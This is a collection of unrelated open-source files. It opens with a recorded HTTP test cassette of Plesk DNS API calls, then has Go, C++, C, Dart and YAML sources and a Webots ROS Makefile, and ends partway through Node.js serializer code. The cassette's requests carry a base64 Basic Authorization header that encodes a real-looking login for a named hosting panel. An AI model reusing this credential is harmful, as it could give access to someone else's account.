\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4852</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.createrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken1</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4853</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.createrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4854</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.noop.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4860</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.deleterecordinset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4863</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.listrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken1</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4864</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.listrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4865</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>random.fqdntest.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4866</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>random.fulltest.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4867</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>random.test.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4869</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>updated.test.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4872</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>updated.testfqdn.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4874</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>updated.testfull.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4890</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>A</type>\n\
\ <host>localhot.lexicon-test.com.</host>\n <value>127.0.0.1</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4918</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>orig.nameonly.test.lexicon-test.com.</host>\n\
\ <value>updated</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4921</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>delete.testfull.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n </get_rec>\n </dns>\n\
</packet>\n"}
headers:
cache-control: ['no-store, no-cache, must-revalidate, post-check=0, pre-check=0']
connection: [keep-alive]
content-length: ['8891']
content-type: [text/xml;charset=UTF-8]
date: ['Tue, 21 Aug 2018 08:30:43 GMT']
expires: ['Mon, 26 Jul 1990 05:00:00 GMT']
last-modified: ['Tue, 21 Aug 2018 08:30:43 GMT']
p3p: [CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"]
pragma: [no-cache]
server: [sw-cp-server]
set-cookie: ['locale=en-US; expires=Wed, 21-Aug-2019 08:30:43 GMT; Max-Age=31536000;
path=/; secure; HttpOnly']
transfer-encoding: [chunked]
status: {code: 200, message: OK}
- request:
body: !!python/unicode "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packet>\n\
\t<dns>\n\t\t<del_rec>\n\t\t\t<filter>\n\t\t\t\t<id>4921</id>\n\t\t\t</filter>\n\
\t\t</del_rec>\n\t</dns>\n</packet>"
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Authorization: [Basic aW90LXBsYXlncm91bmQ6ZTd5X2ZCNzk=]
Connection: [keep-alive]
Content-Length: ['140']
Content-type: [text/xml]
HTTP_PRETTY_PRINT: ['TRUE']
User-Agent: [python-requests/2.19.1]
method: POST
uri: https://quasispace.de:8443/enterprise/control/agent.php
response:
body: {string: !!python/unicode "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\
<packet version=\"1.6.9.1\">\n <dns>\n <del_rec>\n <result>\n \
\ <status>ok</status>\n <id>4921</id>\n </result>\n </del_rec>\n\
\ </dns>\n</packet>\n"}
headers:
cache-control: ['no-store, no-cache, must-revalidate, post-check=0, pre-check=0']
connection: [keep-alive]
content-length: ['203']
content-type: [text/xml;charset=UTF-8]
date: ['Tue, 21 Aug 2018 08:30:43 GMT']
expires: ['Mon, 26 Jul 1990 05:00:00 GMT']
last-modified: ['Tue, 21 Aug 2018 08:30:43 GMT']
p3p: [CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"]
pragma: [no-cache]
server: [sw-cp-server]
set-cookie: ['locale=en-US; expires=Wed, 21-Aug-2019 08:30:43 GMT; Max-Age=31536000;
path=/; secure; HttpOnly']
transfer-encoding: [chunked]
status: {code: 200, message: OK}
- request:
body: !!python/unicode "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packet>\n\
\t<dns>\n\t\t<get_rec>\n\t\t\t<filter>\n\t\t\t\t<site-id>71</site-id>\n\t\t\t\
</filter>\n\t\t</get_rec>\n\t</dns>\n</packet>"
headers:
Accept: ['*/*']
Accept-Encoding: ['gzip, deflate']
Authorization: [Basic aW90LXBsYXlncm91bmQ6ZTd5X2ZCNzk=]
Connection: [keep-alive]
Content-Length: ['148']
Content-type: [text/xml]
HTTP_PRETTY_PRINT: ['TRUE']
User-Agent: [python-requests/2.19.1]
method: POST
uri: https://quasispace.de:8443/enterprise/control/agent.php
response:
body: {string: !!python/unicode "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\
<packet version=\"1.6.9.1\">\n <dns>\n <get_rec>\n <result>\n \
\ <status>ok</status>\n <id>4836</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>ipv4.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4837</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>lexicon-test.com.</host>\n <value>v=spf1 +a +mx\
\ -all</value>\n <opt/>\n </data>\n </result>\n \
\ <result>\n <status>ok</status>\n <id>4838</id>\n <data>\n\
\ <site-id>71</site-id>\n <type>PTR</type>\n <host>83.169.2.56</host>\n\
\ <value>lexicon-test.com.</value>\n <opt>24</opt>\n \
\ </data>\n </result>\n <result>\n <status>ok</status>\n\
\ <id>4839</id>\n <data>\n <site-id>71</site-id>\n\
\ <type>CNAME</type>\n <host>ftp.lexicon-test.com.</host>\n\
\ <value>lexicon-test.com.</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4840</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>CNAME</type>\n\
\ <host>www.lexicon-test.com.</host>\n <value>lexicon-test.com.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4841</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>mail.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4842</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>MX</type>\n\
\ <host>lexicon-test.com.</host>\n <value>mail.lexicon-test.com.</value>\n\
\ <opt>10</opt>\n </data>\n </result>\n <result>\n\
\ <status>ok</status>\n <id>4843</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>webmail.lexicon-test.com.</host>\n\
\ <value>83.169.2.56</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4844</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>A</type>\n\
\ <host>lexicon-test.com.</host>\n <value>83.169.2.56</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4845</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>NS</type>\n <host>lexicon-test.com.</host>\n\
\ <value>ns2.quasispace.de.</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4846</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>NS</type>\n\
\ <host>lexicon-test.com.</host>\n <value>ns2.hans.hosteurope.de.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4847</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>A</type>\n <host>localhost.lexicon-test.com.</host>\n\
\ <value>127.0.0.1</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4848</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>CNAME</type>\n\
\ <host>docs.lexicon-test.com.</host>\n <value>docs.example.com.</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4849</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>_acme-challenge.fqdn.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4850</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.full.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4851</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.test.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4852</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.createrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken1</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4853</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.createrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4854</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.noop.lexicon-test.com.</host>\n \
\ <value>challengetoken</value>\n <opt/>\n </data>\n \
\ </result>\n <result>\n <status>ok</status>\n <id>4860</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.deleterecordinset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4863</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.listrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken1</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4864</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>_acme-challenge.listrecordset.lexicon-test.com.</host>\n\
\ <value>challengetoken2</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4865</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>random.fqdntest.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4866</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>random.fulltest.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4867</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>random.test.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4869</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>updated.test.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4872</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>updated.testfqdn.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4874</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>updated.testfull.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4890</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>A</type>\n\
\ <host>localhot.lexicon-test.com.</host>\n <value>127.0.0.1</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4918</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>orig.nameonly.test.lexicon-test.com.</host>\n\
\ <value>updated</value>\n <opt/>\n </data>\n \
\ </result>\n </get_rec>\n </dns>\n</packet>\n"}
headers:
cache-control: ['no-store, no-cache, must-revalidate, post-check=0, pre-check=0']
connection: [keep-alive]
content-length: ['8606']
content-type: [text/xml;charset=UTF-8]
date: ['Tue, 21 Aug 2018 08:30:44 GMT']
expires: ['Mon, 26 Jul 1990 05:00:00 GMT']
last-modified: ['Tue, 21 Aug 2018 08:30:44 GMT']
p3p: [CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"]
pragma: [no-cache]
server: [sw-cp-server]
set-cookie: ['locale=en-US; expires=Wed, 21-Aug-2019 08:30:44 GMT; Max-Age=31536000;
path=/; secure; HttpOnly']
transfer-encoding: [chunked]
status: {code: 200, message: OK}
version: 1
| {
"pile_set_name": "Github"
} |
package del_test
import (
"testing"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
)
func TestDel(t *testing.T) {
RegisterFailHandler(Fail)
RunSpecs(t, "Del Suite")
}
| {
"pile_set_name": "Github"
} |
name: create_comment
runner_type: run-python
description: "Add a new comment"
enabled: true
entry_point: run.py
parameters:
message:
type: string
description: "The comment text"
required: true
handle:
type: string
description: "The handle of the user making the comment"
required: false
related_event_id:
type: integer
description: "The id of another comment or event to reply to"
required: false
cls:
default: DatadogCreateComment
immutable: true
type: string
module_path:
default: lib.comments
immutable: true
type: string
| {
"pile_set_name": "Github"
} |
/* SPDX-License-Identifier: GPL-2.0-or-later */
/* RomFS internal definitions
*
* Copyright © 2007 Red Hat, Inc. All Rights Reserved.
* Written by David Howells ([email protected])
*/
#include <linux/romfs_fs.h>
struct romfs_inode_info {
struct inode vfs_inode;
unsigned long i_metasize; /* size of non-data area */
unsigned long i_dataoffset; /* from the start of fs */
};
static inline size_t romfs_maxsize(struct super_block *sb)
{
return (size_t) (unsigned long) sb->s_fs_info;
}
static inline struct romfs_inode_info *ROMFS_I(struct inode *inode)
{
return container_of(inode, struct romfs_inode_info, vfs_inode);
}
/*
* mmap-nommu.c
*/
#if !defined(CONFIG_MMU) && defined(CONFIG_ROMFS_ON_MTD)
extern const struct file_operations romfs_ro_fops;
#else
#define romfs_ro_fops generic_ro_fops
#endif
/*
* storage.c
*/
extern int romfs_dev_read(struct super_block *sb, unsigned long pos,
void *buf, size_t buflen);
extern ssize_t romfs_dev_strnlen(struct super_block *sb,
unsigned long pos, size_t maxlen);
extern int romfs_dev_strcmp(struct super_block *sb, unsigned long pos,
const char *str, size_t size);
| {
"pile_set_name": "Github"
} |
#ifndef BOOST_SMART_PTR_ENABLE_SHARED_FROM_THIS_HPP_INCLUDED
#define BOOST_SMART_PTR_ENABLE_SHARED_FROM_THIS_HPP_INCLUDED
//
// enable_shared_from_this.hpp
//
// Copyright 2002, 2009 Peter Dimov
//
// Distributed under the Boost Software License, Version 1.0.
// See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt
//
// http://www.boost.org/libs/smart_ptr/enable_shared_from_this.html
//
#include <boost/smart_ptr/weak_ptr.hpp>
#include <boost/smart_ptr/shared_ptr.hpp>
#include <boost/assert.hpp>
#include <boost/config.hpp>
namespace boost
{
template<class T> class enable_shared_from_this
{
protected:
enable_shared_from_this() BOOST_NOEXCEPT
{
}
enable_shared_from_this(enable_shared_from_this const &) BOOST_NOEXCEPT
{
}
enable_shared_from_this & operator=(enable_shared_from_this const &) BOOST_NOEXCEPT
{
return *this;
}
~enable_shared_from_this() BOOST_NOEXCEPT // ~weak_ptr<T> newer throws, so this call also must not throw
{
}
public:
shared_ptr<T> shared_from_this()
{
shared_ptr<T> p( weak_this_ );
BOOST_ASSERT( p.get() == this );
return p;
}
shared_ptr<T const> shared_from_this() const
{
shared_ptr<T const> p( weak_this_ );
BOOST_ASSERT( p.get() == this );
return p;
}
public: // actually private, but avoids compiler template friendship issues
// Note: invoked automatically by shared_ptr; do not call
template<class X, class Y> void _internal_accept_owner( shared_ptr<X> const * ppx, Y * py ) const
{
if( weak_this_.expired() )
{
weak_this_ = shared_ptr<T>( *ppx, py );
}
}
private:
mutable weak_ptr<T> weak_this_;
};
} // namespace boost
#endif // #ifndef BOOST_SMART_PTR_ENABLE_SHARED_FROM_THIS_HPP_INCLUDED
| {
"pile_set_name": "Github"
} |
description = Sistema de validación.
longdescription = Permitir la validación de los usuarios, gestionar la conexión.
login = Login
connect = Conectarse
password = Contraseña
key = Clave
buttons.login = Login
buttons.logout = Desconexión
failedToLogin = Fallo en la validación
titlePage.failedToLogin = Fallo en la validación
titlePage.login = Login
lostPassword = Contraseña perdida?
rememberMe=Recuérdame
| {
"pile_set_name": "Github"
} |
class ChannelItem{
int tid;
String name;
String logo;
ChannelItem({this.logo,this.name,this.tid});
ChannelItem.fromJson(Map<String ,dynamic> jsondata){
tid=jsondata["tid"];
name=jsondata["name"];
logo=jsondata["logo"];
}
} | {
"pile_set_name": "Github"
} |
/*=========================================================================
Program: Visualization Toolkit
Module: vtkContourFilter.h
Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen
All rights reserved.
See Copyright.txt or http://www.kitware.com/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notice for more information.
=========================================================================*/
/**
* @class vtkPVContourFilter
* @brief generate isosurfaces/isolines from scalar values
*
* vtkPVContourFilter is an extension to vtkContourFilter. It adds the
* ability to generate isosurfaces / isolines for AMR dataset.
*
* vtkPVContourFilter also handles cleaning up interpolation error in the output
* scalars array when `ComputeScalars` is set to true. For each requested
* contour value, the output scalar array may have an error introduced due to
* interpolation along an edge. This filter fixes that error so that for all
* points generated from a particular contour value, the scalar array will have
* exactly the same value.
*
* For certain inputs, this filter delegates operation to vtkContour3DLinearGrid.
* The input must meet the following conditions for this filter to be used:
*
* - all cells in the input are linear (i.e., not higher order)
* - the contour array is one of the types supported by the vtkContour3DLinearGrid
* - the ComputeScalars option is off
*
* @warning
* Certain flags in vtkAMRDualContour are assumed to be ON.
*
* @sa
* vtkContourFilter vtkAMRDualContour
*/
#ifndef vtkPVContourFilter_h
#define vtkPVContourFilter_h
#include "vtkContourFilter.h"
#include "vtkPVVTKExtensionsFiltersGeneralModule.h" //needed for exports
class VTKPVVTKEXTENSIONSFILTERSGENERAL_EXPORT vtkPVContourFilter : public vtkContourFilter
{
public:
vtkTypeMacro(vtkPVContourFilter, vtkContourFilter);
void PrintSelf(ostream& os, vtkIndent indent) override;
static vtkPVContourFilter* New();
int ProcessRequest(vtkInformation*, vtkInformationVector**, vtkInformationVector*) override;
protected:
vtkPVContourFilter();
~vtkPVContourFilter() override;
int RequestData(vtkInformation* request, vtkInformationVector** inputVector,
vtkInformationVector* outputVector) override;
virtual int RequestDataObject(vtkInformation* request, vtkInformationVector** inputVector,
vtkInformationVector* outputVector);
int FillInputPortInformation(int port, vtkInformation* info) override;
int FillOutputPortInformation(int port, vtkInformation* info) override;
/**
* Class superclass request data. Also handles iterating over
* vtkHierarchicalBoxDataSet.
*/
int ContourUsingSuperclass(vtkInformation* request, vtkInformationVector** inputVector,
vtkInformationVector* outputVector);
/**
* When `ComputeScalars` is true, the filter computes scalars for the
* contours. However, due to interpolation errors, there's a small difference
* between the requested contour value and the interpolated scalar value that
* ends up getting computed. That makes it complicated to identify contours
* for a specific scalar value. This method cleans the output scalars array to
* exactly match requested values.
*/
void CleanOutputScalars(vtkDataArray* outScalars);
private:
vtkPVContourFilter(const vtkPVContourFilter&) = delete;
void operator=(const vtkPVContourFilter&) = delete;
};
#endif // vtkPVContourFilter_h
| {
"pile_set_name": "Github"
} |
/*!
@file
Defines operators for Searchables.
@copyright Louis Dionne 2013-2017
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE.md or copy at http://boost.org/LICENSE_1_0.txt)
*/
#ifndef BOOST_HANA_DETAIL_OPERATORS_SEARCHABLE_HPP
#define BOOST_HANA_DETAIL_OPERATORS_SEARCHABLE_HPP
#include <boost/hana/config.hpp>
#include <boost/hana/fwd/at_key.hpp>
BOOST_HANA_NAMESPACE_BEGIN namespace detail {
template <typename Derived>
struct searchable_operators {
template <typename Key>
constexpr decltype(auto) operator[](Key&& key) & {
return hana::at_key(static_cast<Derived&>(*this),
static_cast<Key&&>(key));
}
template <typename Key>
constexpr decltype(auto) operator[](Key&& key) && {
return hana::at_key(static_cast<Derived&&>(*this),
static_cast<Key&&>(key));
}
template <typename Key>
constexpr decltype(auto) operator[](Key&& key) const& {
return hana::at_key(static_cast<Derived const&>(*this),
static_cast<Key&&>(key));
}
};
} BOOST_HANA_NAMESPACE_END
#endif // !BOOST_HANA_DETAIL_OPERATORS_SEARCHABLE_HPP
| {
"pile_set_name": "Github"
} |
// (C) Copyright Tobias Schwinger
//
// Use modification and distribution are subject to the boost Software License,
// Version 1.0. (See http://www.boost.org/LICENSE_1_0.txt).
//------------------------------------------------------------------------------
#ifndef BOOST_FT_IS_FUNCTION_HPP_INCLUDED
#define BOOST_FT_IS_FUNCTION_HPP_INCLUDED
#include <boost/mpl/aux_/lambda_support.hpp>
#include <boost/function_types/components.hpp>
namespace boost
{
namespace function_types
{
template< typename T, typename Tag = null_tag >
struct is_function
: function_types::represents
< function_types::components<T>
, function_types::tag<Tag ,detail::function_tag>
>
{
BOOST_MPL_AUX_LAMBDA_SUPPORT(2,is_function,(T,Tag))
};
}
}
#endif
| {
"pile_set_name": "Github"
} |
# Copyright 1996-2020 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Webots Makefile system
#
# You may add some variable definitions hereafter to customize the build process
# See documentation in $(WEBOTS_HOME_PATH)/resources/Makefile.include
null :=
space := $(null) $(null)
WEBOTS_HOME_PATH=$(subst $(space),\ ,$(strip $(subst \,/,$(WEBOTS_HOME))))
include $(WEBOTS_HOME_PATH)/resources/Makefile.os.include
ifeq ($(OSTYPE),linux)
CFLAGS = -std=c++11
endif
PYTHON_COMMAND ?= python
ifeq (, $(shell which $(PYTHON_COMMAND) 2> /dev/null))
release debug profile clean:
@echo "# \033[0;33m$(PYTHON_COMMAND) not installed, impossible to generate services/messages required by the ros controller, skipping ros controller\033[0m"
else
ifeq (, $(ROS_DISTRO))
release debug profile clean:
@echo "# \033[0;33mROS not installed or 'ROS_DISTRO' not defined\033[0m"
else
ifeq (2, $(ROS_VERSION))
release debug profile clean:
@echo "# \033[0;33mROS_DISTRO should not be a ROS2 distribution\033[0m"
else
CXX_SOURCES = $(wildcard *.cpp)
CXX_SOURCES += $(wildcard $(WEBOTS_HOME_PATH)/projects/default/controllers/ros/Ros*.cpp)
ifeq ($(OSTYPE),windows)
ros_automobile.exe: $(CXX_SOURCES:.cxx=.d)
else
ros_automobile: $(CXX_SOURCES:.cxx=.d)
endif
INCLUDE = -I$(WEBOTS_HOME_PATH)/projects/default/controllers/ros -isystem $(WEBOTS_HOME_PATH)/projects/default/controllers/ros/include -isystem /opt/ros/$(ROS_DISTRO)/include
LIBRARIES += -lCppDriver -lCppCar -ldriver -lcar
# include ros libraries
LIBRARIES += -L/opt/ros/$(ROS_DISTRO)/lib -lxmlrpcpp -lcpp_common -lrosconsole_backend_interface -lroscpp -lrosconsole -lrosconsole_log4cxx -lroscpp_serialization -lrostime
ifeq ($(OSTYPE),windows)
LIBRARIES += -lws2_32
ifeq ($(MAKECMDGOALS),debug)
# The following option is fixing the following error
# appearing only on Windows 64 bits in debug mode
# (probably that the number of templates is causing this)
# RosSupervisor.o: too many sections
CFLAGS += -Wa,-mbig-obj
endif
endif
ifeq ($(OSTYPE),linux)
LIBRARIES += -Wl,-rpath,$(WEBOTS_HOME_PATH)/projects/default/controllers/ros/lib/ros
endif
ifeq ($(OSTYPE),darwin)
# Hide Boost warnings
CFLAGS += -Wno-unused-local-typedefs
# Fix warnings about the 'override' keyword.
CFLAGS += -std=c++11
endif
include $(WEBOTS_HOME_PATH)/resources/Makefile.include
endif
endif
endif
| {
"pile_set_name": "Github"
} |
#include "node_internals.h"
#include "node_buffer.h"
#include "node_errors.h"
#include "util-inl.h"
#include "base_object-inl.h"
namespace node {
using v8::Array;
using v8::ArrayBuffer;
using v8::Context;
using v8::Function;
using v8::FunctionCallbackInfo;
using v8::FunctionTemplate;
using v8::Integer;
using v8::Isolate;
using v8::Just;
using v8::Local;
using v8::Maybe;
using v8::MaybeLocal;
using v8::Nothing;
using v8::Object;
using v8::SharedArrayBuffer;
using v8::String;
using v8::Value;
using v8::ValueDeserializer;
using v8::ValueSerializer;
namespace {
class SerializerContext : public BaseObject,
public ValueSerializer::Delegate {
public:
SerializerContext(Environment* env,
Local<Object> wrap);
~SerializerContext() override = default;
void ThrowDataCloneError(Local<String> message) override;
Maybe<bool> WriteHostObject(Isolate* isolate, Local<Object> object) override;
Maybe<uint32_t> GetSharedArrayBufferId(
Isolate* isolate, Local<SharedArrayBuffer> shared_array_buffer) override;
static void SetTreatArrayBufferViewsAsHostObjects(
const FunctionCallbackInfo<Value>& args);
static void New(const FunctionCallbackInfo<Value>& args);
static void WriteHeader(const FunctionCallbackInfo<Value>& args);
static void WriteValue(const FunctionCallbackInfo<Value>& args);
static void ReleaseBuffer(const FunctionCallbackInfo<Value>& args);
static void TransferArrayBuffer(const FunctionCallbackInfo<Value>& args);
static void WriteUint32(const FunctionCallbackInfo<Value>& args);
static void WriteUint64(const FunctionCallbackInfo<Value>& args);
static void WriteDouble(const FunctionCallbackInfo<Value>& args);
static void WriteRawBytes(const FunctionCallbackInfo<Value>& args);
SET_NO_MEMORY_INFO()
SET_MEMORY_INFO_NAME(SerializerContext)
SET_SELF_SIZE(SerializerContext)
private:
ValueSerializer serializer_;
};
class DeserializerContext : public BaseObject,
public ValueDeserializer::Delegate {
public:
DeserializerContext(Environment* env,
Local<Object> wrap,
Local<Value> buffer);
~DeserializerContext() override = default;
MaybeLocal<Object> ReadHostObject(Isolate* isolate) override;
static void New(const FunctionCallbackInfo<Value>& args);
static void ReadHeader(const FunctionCallbackInfo<Value>& args);
static void ReadValue(const FunctionCallbackInfo<Value>& args);
static void TransferArrayBuffer(const FunctionCallbackInfo<Value>& args);
static void GetWireFormatVersion(const FunctionCallbackInfo<Value>& args);
static void ReadUint32(const FunctionCallbackInfo<Value>& args);
static void ReadUint64(const FunctionCallbackInfo<Value>& args);
static void ReadDouble(const FunctionCallbackInfo<Value>& args);
static void ReadRawBytes(const FunctionCallbackInfo<Value>& args);
SET_NO_MEMORY_INFO()
SET_MEMORY_INFO_NAME(DeserializerContext)
SET_SELF_SIZE(DeserializerContext)
private:
const uint8_t* data_;
const size_t length_;
ValueDeserializer deserializer_;
};
SerializerContext::SerializerContext(Environment* env, Local<Object> wrap)
: BaseObject(env, wrap),
serializer_(env->isolate(), this) {
MakeWeak();
}
void SerializerContext::ThrowDataCloneError(Local<String> message) {
Local<Value> args[1] = { message };
Local<Value> get_data_clone_error =
object()->Get(env()->context(),
env()->get_data_clone_error_string())
.ToLocalChecked();
CHECK(get_data_clone_error->IsFunction());
MaybeLocal<Value> error =
get_data_clone_error.As<Function>()->Call(env()->context(),
object(),
arraysize(args),
args);
if (error.IsEmpty()) return;
